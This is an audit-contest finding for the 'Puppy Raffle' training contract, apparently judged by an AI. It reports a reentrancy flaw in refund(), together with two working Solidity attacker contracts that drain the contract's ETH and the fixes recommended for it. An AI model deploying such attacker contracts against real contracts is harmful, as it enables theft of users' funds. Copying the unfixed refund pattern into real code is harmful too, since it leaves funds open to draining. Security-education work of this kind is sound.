Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Reentrancy Attack in refund() Function Allows Draining Contract Funds

wanzablock

Root + Impact

Description

Describe the normal behavior in one or more sentences
The refund() function should:
- Verify the caller is the player at the specified index
- Update the players array to mark the player as refunded
- Send the entrance fee back to the player
Explain the specific issue or problem in one or more sentences
The function makes an external call via payable(msg.sender).sendValue(entranceFee) at line 119 BEFORE updating the players[playerIndex] state at line 121. This allows an attacker to re-enter the function and withdraw multiple times before their player slot is cleared.

// Root cause in the codebase with @> marks to highlight the relevant section

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

// @> VULNERABILITY: External call BEFORE state change

payable(msg.sender).sendValue(entranceFee);

// @> State updated AFTER external call - allows reentrancy

players[playerIndex] = address(0);

emit RaffleRefunded(playerAddress);

}

Risk

Likelihood:

Reason 1 The vulnerability is trivially exploitable - any player can create a malicious contract that re-enters the refund() function upon receiving ETH.
Reason 2 The attack requires no special permissions or timing - any player can execute it at will during an active raffle.
Reason 3 Solidity's default behavior when sending ETH to a contract triggers the receive() or fallback() function, making reentrancy the expected attack vector.

Impact:

Impact 1 An attacker can drain all ETH from the contract by recursively calling refund() until the contract balance is depleted.
Impact 2 Legitimate players lose their entrance fees and cannot receive refunds or winnings.
Impact 3 The raffle becomes permanently inoperable as funds needed for prize distribution are stolen.
Impact 4 The protocol's reputation is destroyed, and users lose trust in the platform.

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity 0.8.30;

import {PuppyRaffle} from "./PuppyRaffle.sol";

contract ReentrancyAttacker {

PuppyRaffle public puppyRaffle;

uint256 public attackerIndex;

uint256 public entranceFee;

uint256 public attackCount;

constructor(address _puppyRaffle) {

puppyRaffle = PuppyRaffle(_puppyRaffle);

entranceFee = puppyRaffle.entranceFee();

}

// Step 1: Enter the raffle

function enterRaffle() external payable {

address[] memory players = new address[](1);

players[0] = address(this);

puppyRaffle.enterRaffle{value: entranceFee}(players);

attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));

}

// Step 2: Initiate the attack

function attack() external {

puppyRaffle.refund(attackerIndex);

}

// Step 3: Reentrancy occurs here

receive() external payable {

// Re-enter refund() up to 10 times or until contract is drained

if (attackCount < 10 && address(puppyRaffle).balance >= entranceFee) {

attackCount++;

puppyRaffle.refund(attackerIndex);

}

// Withdraw stolen funds

function withdraw() external {

payable(msg.sender).transfer(address(this).balance);

}

// Test scenario:

// 1. Deploy PuppyRaffle with entranceFee = 1 ether

// 2. 4 legitimate users enter with 1 ether each (4 ETH in contract)

// 3. Deploy ReentrancyAttacker

// 4. Attacker enters with 1 ether (5 ETH in contract)

// 5. Attacker calls attack()

// 6. Result: Attacker drains all 5 ETH through reentrancy

Recommended Mitigation

- remove this code+ import {ReentrancyGuard} from "@openzeppelin/contracts/security/ReentrancyGuard.sol";

- contract PuppyRaffle is ERC721, Ownable {

+ contract PuppyRaffle is ERC721, Ownable, ReentrancyGuard {

- function refund(uint256 playerIndex) public {

+ function refund(uint256 playerIndex) public nonReentrant {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

- payable(msg.sender).sendValue(entranceFee);

+ // Effects: Update state BEFORE external call (CEI pattern)

players[playerIndex] = address(0);

+ // Interactions: External call happens LAST

+ payable(msg.sender).sendValue(entranceFee);

emit RaffleRefunded(playerAddress);

}

+ add this code

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 11 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!